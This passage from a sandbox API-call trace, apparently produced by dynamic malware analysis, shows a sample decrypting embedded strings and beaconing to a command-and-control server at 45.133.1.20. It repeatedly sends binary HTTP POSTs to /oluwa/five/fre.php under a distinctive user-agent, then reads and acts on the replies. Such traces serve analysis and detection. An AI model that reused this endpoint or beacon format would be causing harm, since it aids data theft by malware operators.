phProv=0x19fca8*=0x0) returned 1 [0257.922] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.922] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0257.933] GetProcessHeap () returned 0x6a0000 [0257.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6dc8b0 [0257.937] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.938] CryptImportKey (in: hProv=0x6bf278, pbData=0x6dc8b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0257.939] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.939] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0257.940] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.940] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0257.941] GetProcessHeap () returned 0x6a0000 [0257.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc8b0 | out: hHeap=0x6a0000) returned 1 [0257.942] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.942] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0257.943] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.943] CryptDestroyKey (hKey=0x6ad020) returned 1 [0257.944] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.944] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0257.944] GetProcessHeap () returned 0x6a0000 [0257.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0257.945] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0257.946] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0257.946] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0257.947] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0257.948] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0257.948] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0257.949] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0257.950] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0257.950] GetProcessHeap () returned 0x6a0000 [0257.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0257.950] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0257.950] GetProcessHeap () returned 0x6a0000 [0257.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0257.951] GetProcessHeap () returned 0x6a0000 [0257.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0257.951] GetProcessHeap () returned 0x6a0000 [0257.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0257.952] GetProcessHeap () returned 0x6a0000 [0257.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0257.953] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.954] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0257.971] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.975] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0257.984] GetProcessHeap () returned 0x6a0000 [0257.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0257.985] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.985] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0257.986] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.986] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0257.987] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.992] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0257.992] GetProcessHeap () returned 0x6a0000 [0257.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0257.993] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.994] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0257.994] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.995] CryptDestroyKey (hKey=0x6ad060) returned 1 [0257.995] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.995] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0257.995] GetProcessHeap () returned 0x6a0000 [0257.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0257.996] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0257.996] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0257.997] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0257.998] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0257.998] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0257.999] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0257.999] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0258.000] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0258.000] GetProcessHeap () returned 0x6a0000 [0258.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0258.000] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0258.000] GetProcessHeap () returned 0x6a0000 [0258.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baab0 [0258.000] socket (af=2, type=1, protocol=6) returned 0x8b4 [0258.000] connect (s=0x8b4, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0258.027] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0258.027] GetProcessHeap () returned 0x6a0000 [0258.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf0e0 [0258.027] GetProcessHeap () returned 0x6a0000 [0258.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0258.027] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0258.028] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0258.028] GetProcessHeap () returned 0x6a0000 [0258.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6db108 [0258.028] GetProcessHeap () returned 0x6a0000 [0258.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0258.029] GetProcessHeap () returned 0x6a0000 [0258.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0258.029] GetProcessHeap () returned 0x6a0000 [0258.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0258.030] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0258.031] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0258.032] GetProcessHeap () returned 0x6a0000 [0258.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0258.032] GetProcessHeap () returned 0x6a0000 [0258.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0258.032] send (s=0x8b4, buf=0x6bd460*, len=242, flags=0) returned 242 [0258.033] send (s=0x8b4, buf=0x6bb998*, len=159, flags=0) returned 159 [0258.033] GetProcessHeap () returned 0x6a0000 [0258.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6b9908 [0258.033] recv (in: s=0x8b4, buf=0x6b9908, len=4048, flags=0 | out: buf=0x6b9908*) returned 204 [0258.109] GetProcessHeap () returned 0x6a0000 [0258.109] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0258.110] GetProcessHeap () returned 0x6a0000 [0258.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0258.111] GetProcessHeap () returned 0x6a0000 [0258.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db108 | out: hHeap=0x6a0000) returned 1 [0258.111] GetProcessHeap () returned 0x6a0000 [0258.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf0e0 | out: hHeap=0x6a0000) returned 1 [0258.112] closesocket (s=0x8b4) returned 0 [0258.112] GetProcessHeap () returned 0x6a0000 [0258.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baab0 | out: hHeap=0x6a0000) returned 1 [0258.112] GetProcessHeap () returned 0x6a0000 [0258.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0258.114] GetProcessHeap () returned 0x6a0000 [0258.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0258.115] GetProcessHeap () returned 0x6a0000 [0258.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0258.116] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b9908, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15e4) returned 0x8b4 [0258.118] Sleep (dwMilliseconds=0xea60) [0258.120] GetProcessHeap () returned 0x6a0000 [0258.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0258.124] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.124] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0258.132] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.132] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0258.171] GetProcessHeap () returned 0x6a0000 [0258.171] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6dc910 [0258.172] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.173] CryptImportKey (in: hProv=0x6bf278, pbData=0x6dc910, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0258.173] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.174] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0258.175] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.175] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0258.175] GetProcessHeap () returned 0x6a0000 [0258.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc910 | out: hHeap=0x6a0000) returned 1 [0258.179] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.184] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0258.184] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.185] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0258.186] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.186] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0258.186] GetProcessHeap () returned 0x6a0000 [0258.186] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0258.187] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0258.188] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0258.188] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0258.189] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0258.190] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0258.190] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0258.191] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0258.191] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0258.191] GetProcessHeap () returned 0x6a0000 [0258.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0258.191] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0258.191] GetProcessHeap () returned 0x6a0000 [0258.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0258.192] GetProcessHeap () returned 0x6a0000 [0258.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0258.192] GetProcessHeap () returned 0x6a0000 [0258.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0258.193] GetProcessHeap () returned 0x6a0000 [0258.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0258.193] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.194] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0258.212] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.212] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0258.223] GetProcessHeap () returned 0x6a0000 [0258.223] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0258.224] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.224] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0258.225] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.225] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0258.226] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.226] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0258.226] GetProcessHeap () returned 0x6a0000 [0258.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0258.230] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.230] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0258.242] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.243] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0258.257] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.258] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0258.258] GetProcessHeap () returned 0x6a0000 [0258.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0258.259] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0258.259] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0258.260] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0258.260] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0258.261] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0258.262] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0258.262] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0258.263] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0258.263] GetProcessHeap () returned 0x6a0000 [0258.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0258.263] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0258.263] GetProcessHeap () returned 0x6a0000 [0258.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9a0 [0258.263] socket (af=2, type=1, protocol=6) returned 0x8b8 [0258.264] connect (s=0x8b8, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0258.293] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0258.293] GetProcessHeap () returned 0x6a0000 [0258.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0258.293] GetProcessHeap () returned 0x6a0000 [0258.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0258.294] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0258.296] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0258.296] GetProcessHeap () returned 0x6a0000 [0258.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6dc818 [0258.296] GetProcessHeap () returned 0x6a0000 [0258.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0258.297] GetProcessHeap () returned 0x6a0000 [0258.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0258.297] GetProcessHeap () returned 0x6a0000 [0258.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0258.298] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0258.299] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0258.299] GetProcessHeap () returned 0x6a0000 [0258.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0258.299] GetProcessHeap () returned 0x6a0000 [0258.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0258.299] send (s=0x8b8, buf=0x6bd460*, len=242, flags=0) returned 242 [0258.300] send (s=0x8b8, buf=0x6bb998*, len=159, flags=0) returned 159 [0258.300] GetProcessHeap () returned 0x6a0000 [0258.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0258.300] recv (in: s=0x8b8, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0258.380] GetProcessHeap () returned 0x6a0000 [0258.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0258.381] GetProcessHeap () returned 0x6a0000 [0258.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0258.381] GetProcessHeap () returned 0x6a0000 [0258.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc818 | out: hHeap=0x6a0000) returned 1 [0258.382] GetProcessHeap () returned 0x6a0000 [0258.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0258.383] closesocket (s=0x8b8) returned 0 [0258.384] GetProcessHeap () returned 0x6a0000 [0258.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9a0 | out: hHeap=0x6a0000) returned 1 [0258.384] GetProcessHeap () returned 0x6a0000 [0258.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0258.385] GetProcessHeap () returned 0x6a0000 [0258.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0258.386] GetProcessHeap () returned 0x6a0000 [0258.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0258.387] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15e8) returned 0x8b8 [0258.389] Sleep (dwMilliseconds=0xea60) [0258.391] GetProcessHeap () returned 0x6a0000 [0258.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0258.392] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.392] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0258.402] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.402] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0258.423] GetProcessHeap () returned 0x6a0000 [0258.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0258.424] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.425] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0258.426] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0258.426] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0258.427] 